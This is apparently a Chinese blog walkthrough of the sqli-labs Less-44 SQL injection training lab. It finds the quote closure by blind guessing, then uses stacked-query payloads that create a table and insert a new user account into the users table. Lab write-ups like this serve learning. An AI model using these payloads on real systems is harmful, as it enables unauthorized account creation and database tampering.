sqli-labs (less-44)

sqli-labs (less-44)

进入44关,发现依然是这个页面
sqli-labs (less-44)
输入admin'
sqli-labs (less-44)
这里发现没有错误回显了,所以我们只能去猜了

admin# #登入失败
admin'# #登入成功

sqli-labs (less-44)
所以判断闭合方式为’#,并且为字符型注入

这里我们直接使用堆叠注入

创建一张表

a';create table test like users;#

sqli-labs (less-44)
创建一个新的用户

a';insert into users values(18,'icepeak','icepeak');#

sqli-labs (less-44)

上一篇:xss-labs 小结


下一篇:Docker部署Golang项目及镜像优化实战